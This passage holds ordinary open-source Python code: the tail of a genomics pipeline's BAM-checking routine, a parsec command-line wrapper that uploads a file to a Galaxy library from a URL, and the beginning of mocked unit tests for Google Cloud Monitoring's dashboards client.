ID = common_prefix(pair).strip("-_")
new_sample_file.write("\t".join(pair) + "\t" + ID + "\n")
msg("Sample File Created")
exit(0)
def check_bams(self):
"""
Generates list of bam merged (multi-sample)
files; whether or not they exist, and whether
or not they have the correct read group
which reflects
"""
for bam in self.SM_Group_set.values():
bam["bam_merged_exists_and_RG_correct"] = False
bam["bam_ind_exists_and_RG_correct"] = []
if check_seq_file(bam["bam_merged_filename"]):
if bam["RG"] == bamfile(bam["bam_merged_filename"]).RG:
bam["bam_merged_exists_and_RG_correct"] = True
bam["bam_ind_exists_and_RG_correct"] = []
for ind_bam in bam["bam_ind_filename"]:
if check_seq_file(ind_bam):
if bamfile(ind_bam).RG[0] in bam["RG"]:
bam["bam_ind_exists_and_RG_correct"].append(True)
else:
bam["bam_ind_exists_and_RG_correct"].append(False)
yield dotdictify(bam)
| AndersenLab/pyPipeline | utils/configuration.py | Python | mit | 15,150 | [
"BWA"
] | e03cf120e89a803c689825b8b98370752e7731467f40fff478d1c57014ccd16b |
import click
from parsec.cli import pass_context, json_loads
from parsec.decorators import custom_exception, json_output
@click.command('upload_file_from_url')
@click.argument("library_id", type=str)
@click.argument("file_url", type=str)
@click.option(
"--folder_id",
help="id of the folder where to place the uploaded file. If not provided, the root folder will be used",
type=str
)
@click.option(
"--file_type",
help="Galaxy file format name",
default="auto",
show_default=True,
type=str
)
@click.option(
"--dbkey",
help="Dbkey",
default="?",
show_default=True,
type=str
)
@click.option(
"--tags",
help="A list of tags to add to the datasets",
type=str,
multiple=True
)
@pass_context
@custom_exception
@json_output
def cli(ctx, library_id, file_url, folder_id="", file_type="auto", dbkey="?", tags=""):
"""Upload a file to a library from a URL.
Output:
List with a single dictionary containing information about the LDDA
"""
return ctx.gi.libraries.upload_file_from_url(library_id, file_url, folder_id=folder_id, file_type=file_type, dbkey=dbkey, tags=tags)
| galaxy-iuc/parsec | parsec/commands/libraries/upload_file_from_url.py | Python | apache-2.0 | 1,148 | [
"Galaxy"
] | 6b22743d3072bdd28309e742c1ba7594e89352fd18abaf814d8607cdeae70e7c |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.monitoring_dashboard_v1.services.dashboards_service import (
DashboardsServiceAsyncClient,
)
from google.cloud.monitoring_dashboard_v1.services.dashboards_service import (
DashboardsServiceClient,
)
from google.cloud.monitoring_dashboard_v1.services.dashboards_service import pagers
from google.cloud.monitoring_dashboard_v1.services.dashboards_service import transports
from google.cloud.monitoring_dashboard_v1.types import alertchart
from google.cloud.monitoring_dashboard_v1.types import common
from google.cloud.monitoring_dashboard_v1.types import dashboard
from google.cloud.monitoring_dashboard_v1.types import dashboards_service
from google.cloud.monitoring_dashboard_v1.types import layouts
from google.cloud.monitoring_dashboard_v1.types import metrics
from google.cloud.monitoring_dashboard_v1.types import scorecard
from google.cloud.monitoring_dashboard_v1.types import text
from google.cloud.monitoring_dashboard_v1.types import widget
from google.cloud.monitoring_dashboard_v1.types import xychart
from google.oauth2 import service_account
from google.protobuf import duration_pb2 # type: ignore
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert DashboardsServiceClient._get_default_mtls_endpoint(None) is None
assert (
DashboardsServiceClient._get_default_mtls_endpoint(api_endpoint)
== api_mtls_endpoint
)
assert (
DashboardsServiceClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
DashboardsServiceClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
DashboardsServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert (
DashboardsServiceClient._get_default_mtls_endpoint(non_googleapi)
== non_googleapi
)
@pytest.mark.parametrize(
"client_class", [DashboardsServiceClient, DashboardsServiceAsyncClient,]
)
def test_dashboards_service_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "monitoring.googleapis.com:443"
@pytest.mark.parametrize(
"transport_class,transport_name",
[
(transports.DashboardsServiceGrpcTransport, "grpc"),
(transports.DashboardsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
],
)
def test_dashboards_service_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize(
"client_class", [DashboardsServiceClient, DashboardsServiceAsyncClient,]
)
def test_dashboards_service_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "monitoring.googleapis.com:443"
def test_dashboards_service_client_get_transport_class():
transport = DashboardsServiceClient.get_transport_class()
available_transports = [
transports.DashboardsServiceGrpcTransport,
]
assert transport in available_transports
transport = DashboardsServiceClient.get_transport_class("grpc")
assert transport == transports.DashboardsServiceGrpcTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(DashboardsServiceClient, transports.DashboardsServiceGrpcTransport, "grpc"),
(
DashboardsServiceAsyncClient,
transports.DashboardsServiceGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
@mock.patch.object(
DashboardsServiceClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(DashboardsServiceClient),
)
@mock.patch.object(
DashboardsServiceAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(DashboardsServiceAsyncClient),
)
def test_dashboards_service_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(DashboardsServiceClient, "get_transport_class") as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(DashboardsServiceClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class(transport=transport_name)
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class(transport=transport_name)
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(
DashboardsServiceClient,
transports.DashboardsServiceGrpcTransport,
"grpc",
"true",
),
(
DashboardsServiceAsyncClient,
transports.DashboardsServiceGrpcAsyncIOTransport,
"grpc_asyncio",
"true",
),
(
DashboardsServiceClient,
transports.DashboardsServiceGrpcTransport,
"grpc",
"false",
),
(
DashboardsServiceAsyncClient,
transports.DashboardsServiceGrpcAsyncIOTransport,
"grpc_asyncio",
"false",
),
],
)
@mock.patch.object(
DashboardsServiceClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(DashboardsServiceClient),
)
@mock.patch.object(
DashboardsServiceAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(DashboardsServiceAsyncClient),
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_dashboards_service_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class", [DashboardsServiceClient, DashboardsServiceAsyncClient]
)
@mock.patch.object(
DashboardsServiceClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(DashboardsServiceClient),
)
@mock.patch.object(
DashboardsServiceAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(DashboardsServiceAsyncClient),
)
def test_dashboards_service_client_get_mtls_endpoint_and_cert_source(client_class):
mock_client_cert_source = mock.Mock()
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "true".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source == mock_client_cert_source
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "false".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "false"}):
mock_client_cert_source = mock.Mock()
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert doesn't exist.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert exists.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=mock_client_cert_source,
):
(
api_endpoint,
cert_source,
) = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source == mock_client_cert_source
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(DashboardsServiceClient, transports.DashboardsServiceGrpcTransport, "grpc"),
(
DashboardsServiceAsyncClient,
transports.DashboardsServiceGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
def test_dashboards_service_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[
(
DashboardsServiceClient,
transports.DashboardsServiceGrpcTransport,
"grpc",
grpc_helpers,
),
(
DashboardsServiceAsyncClient,
transports.DashboardsServiceGrpcAsyncIOTransport,
"grpc_asyncio",
grpc_helpers_async,
),
],
)
def test_dashboards_service_client_client_options_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_dashboards_service_client_client_options_from_dict():
with mock.patch(
"google.cloud.monitoring_dashboard_v1.services.dashboards_service.transports.DashboardsServiceGrpcTransport.__init__"
) as grpc_transport:
grpc_transport.return_value = None
client = DashboardsServiceClient(
client_options={"api_endpoint": "squid.clam.whelk"}
)
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[
(
DashboardsServiceClient,
transports.DashboardsServiceGrpcTransport,
"grpc",
grpc_helpers,
),
(
DashboardsServiceAsyncClient,
transports.DashboardsServiceGrpcAsyncIOTransport,
"grpc_asyncio",
grpc_helpers_async,
),
],
)
def test_dashboards_service_client_create_channel_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# test that the credentials from file are saved and used as the credentials.
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel"
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
file_creds = ga_credentials.AnonymousCredentials()
load_creds.return_value = (file_creds, None)
adc.return_value = (creds, None)
client = client_class(client_options=options, transport=transport_name)
create_channel.assert_called_with(
"monitoring.googleapis.com:443",
credentials=file_creds,
credentials_file=None,
quota_project_id=None,
default_scopes=(
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/monitoring",
"https://www.googleapis.com/auth/monitoring.read",
"https://www.googleapis.com/auth/monitoring.write",
),
scopes=None,
default_host="monitoring.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"request_type", [dashboards_service.CreateDashboardRequest, dict,]
)
def test_create_dashboard(request_type, transport: str = "grpc"):
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_dashboard), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = dashboard.Dashboard(
name="name_value",
display_name="display_name_value",
etag="etag_value",
grid_layout=layouts.GridLayout(columns=769),
)
response = client.create_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.CreateDashboardRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, dashboard.Dashboard)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
def test_create_dashboard_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_dashboard), "__call__") as call:
client.create_dashboard()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.CreateDashboardRequest()
@pytest.mark.asyncio
async def test_create_dashboard_async(
transport: str = "grpc_asyncio",
request_type=dashboards_service.CreateDashboardRequest,
):
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_dashboard), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
dashboard.Dashboard(
name="name_value", display_name="display_name_value", etag="etag_value",
)
)
response = await client.create_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.CreateDashboardRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, dashboard.Dashboard)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
@pytest.mark.asyncio
async def test_create_dashboard_async_from_dict():
await test_create_dashboard_async(request_type=dict)
def test_create_dashboard_field_headers():
client = DashboardsServiceClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = dashboards_service.CreateDashboardRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_dashboard), "__call__") as call:
call.return_value = dashboard.Dashboard()
client.create_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_dashboard_field_headers_async():
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = dashboards_service.CreateDashboardRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_dashboard), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(dashboard.Dashboard())
await client.create_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.parametrize(
"request_type", [dashboards_service.ListDashboardsRequest, dict,]
)
def test_list_dashboards(request_type, transport: str = "grpc"):
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = dashboards_service.ListDashboardsResponse(
next_page_token="next_page_token_value",
)
response = client.list_dashboards(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.ListDashboardsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListDashboardsPager)
assert response.next_page_token == "next_page_token_value"
def test_list_dashboards_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
client.list_dashboards()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.ListDashboardsRequest()
@pytest.mark.asyncio
async def test_list_dashboards_async(
transport: str = "grpc_asyncio",
request_type=dashboards_service.ListDashboardsRequest,
):
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
dashboards_service.ListDashboardsResponse(
next_page_token="next_page_token_value",
)
)
response = await client.list_dashboards(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.ListDashboardsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListDashboardsAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_dashboards_async_from_dict():
await test_list_dashboards_async(request_type=dict)
def test_list_dashboards_field_headers():
client = DashboardsServiceClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = dashboards_service.ListDashboardsRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
call.return_value = dashboards_service.ListDashboardsResponse()
client.list_dashboards(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_dashboards_field_headers_async():
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = dashboards_service.ListDashboardsRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
dashboards_service.ListDashboardsResponse()
)
await client.list_dashboards(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_list_dashboards_pager(transport_name: str = "grpc"):
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials, transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
dashboards_service.ListDashboardsResponse(
dashboards=[
dashboard.Dashboard(),
dashboard.Dashboard(),
dashboard.Dashboard(),
],
next_page_token="abc",
),
dashboards_service.ListDashboardsResponse(
dashboards=[], next_page_token="def",
),
dashboards_service.ListDashboardsResponse(
dashboards=[dashboard.Dashboard(),], next_page_token="ghi",
),
dashboards_service.ListDashboardsResponse(
dashboards=[dashboard.Dashboard(), dashboard.Dashboard(),],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_dashboards(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, dashboard.Dashboard) for i in results)
def test_list_dashboards_pages(transport_name: str = "grpc"):
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials, transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_dashboards), "__call__") as call:
